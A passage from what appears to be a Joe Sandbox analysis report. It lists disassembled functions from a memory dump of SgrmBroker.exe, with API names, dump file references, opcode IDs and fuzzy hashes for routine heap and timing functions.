                                                                                      • Instruction Fuzzy Hash: CF41E162E0C96246F7644E91A40837E66F1EF54B88F444233EE8EC7BD5DE7CE9A18740
                                                                                      Function 00007FF6D9CF5C80 Relevance: 6.4, APIs: 5, Instructions: 163memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • HeapFree.KERNEL32(?,00000003,?,?,?,00000000,00007FF6D9CF4991,?,?,?), ref: 00007FF6D9CF5CAC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: dbf54df03c0e716c8f26d17db86b7577dfb163276607b0301c6c03ca70ee8d67
                                                                                      • Instruction ID: e2b76f65a24ddf610d175f0418ca4aeb8b5d41ed5cea4c88adc6b587f79228f5
                                                                                      • Opcode Fuzzy Hash: dbf54df03c0e716c8f26d17db86b7577dfb163276607b0301c6c03ca70ee8d67
                                                                                      • Instruction Fuzzy Hash: 12618122A1EA8182E6619F56E84427D6771FB88BE8F944237DF1D877D4DF3CE4619300
                                                                                      Function 00007FF6D9D01040 Relevance: 6.4, APIs: 5, Instructions: 149memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 39c0f06d200843a77e232f636d18a5ad1324365d2fb5ad49983b5a976bbe5905
                                                                                      • Instruction ID: 99bb28d7fe50ea48536a58d525d7a2dd4e66a4d080b1e49ce8b75513d1b0b240
                                                                                      • Opcode Fuzzy Hash: 39c0f06d200843a77e232f636d18a5ad1324365d2fb5ad49983b5a976bbe5905
                                                                                      • Instruction Fuzzy Hash: 36516131A09A4282F7659F22E4803BD67A1EF89B94F444536DA8E877D5DF3CE4A1C700
                                                                                      Function 00007FF6D9CF3FC0 Relevance: 6.4, APIs: 5, Instructions: 113memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 243a0f7842a5e05cbb415c07ab7c271283c2bb5c95327b3d0d17a2ff07a4d1b7
                                                                                      • Instruction ID: 06b2dabb5d335c4b47a7bd0e90d4e8c93b11cbbac3bfd7bd01ad371a7d7d1974
                                                                                      • Opcode Fuzzy Hash: 243a0f7842a5e05cbb415c07ab7c271283c2bb5c95327b3d0d17a2ff07a4d1b7
                                                                                      • Instruction Fuzzy Hash: 97414B22A0AA4292E6559F16E94467E67B0FF88BD8F484433DE5E87791CF3CE4A1C300
                                                                                      Function 00007FF6D9DB9B50 Relevance: 6.1, APIs: 4, Instructions: 132memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap$AddressSingleWake
                                                                                      • String ID:
                                                                                      • API String ID: 2995119335-0
                                                                                      • Opcode ID: e0027cba70901082cc4d4abf9cd1ee81cc6d3d09a77482d2cf3a9a915a8bc024
                                                                                      • Instruction ID: 25ff8a639801291c1fdbf5afb2c4b113ce7ace53b0e36c1b20fa66dee3e2e971
                                                                                      • Opcode Fuzzy Hash: e0027cba70901082cc4d4abf9cd1ee81cc6d3d09a77482d2cf3a9a915a8bc024
                                                                                      • Instruction Fuzzy Hash: 9D611521D0DE9681FBA19F26E88037D27B0AF58B5CF554237D90DC32E5CF2DA4A68340
                                                                                      Function 00007FF6D9DD4674 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: 9741ba447e07edec4c5e1c588e2ac751daa5eb8f6c8adf5e6306aa306bcd0db3
                                                                                      • Instruction ID: 39382dcd53ce4b086604e36e4922c124032f677b35b15a8e77848a4768b3056c
                                                                                      • Opcode Fuzzy Hash: 9741ba447e07edec4c5e1c588e2ac751daa5eb8f6c8adf5e6306aa306bcd0db3
                                                                                      • Instruction Fuzzy Hash: 40115E22A04F418BEB50CF61E8942B833A4FB5DB58F441A36EA5D877A4DF3CD5A88340
                                                                                      Function 00007FF6D9D05E30 Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2577750077.00007FF6D9CF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9CF0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2577685256.00007FF6D9CF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578261861.00007FF6D9E5A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578324999.00007FF6D9E5C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2578402199.00007FF6D9E63000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff6d9cf0000_SgrmBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 17d661b32cb9be3543c2e221b25bd98a96f04add73e29abb7685b564963cab7f
                                                                                      • Instruction ID: a377df89bdeb5ce25c55df806a014aefaa1e5dcc77adc79d7de660a9e21cd121
                                                                                      • Opcode Fuzzy Hash: 17d661b32cb9be3543c2e221b25bd98a96f04add73e29abb7685b564963cab7f
                                                                                      • Instruction Fuzzy Hash: 4521F166A09E4182FB659F57E48437D6BA1FF88BA4F444533CE8D86690DF3CE4A6D300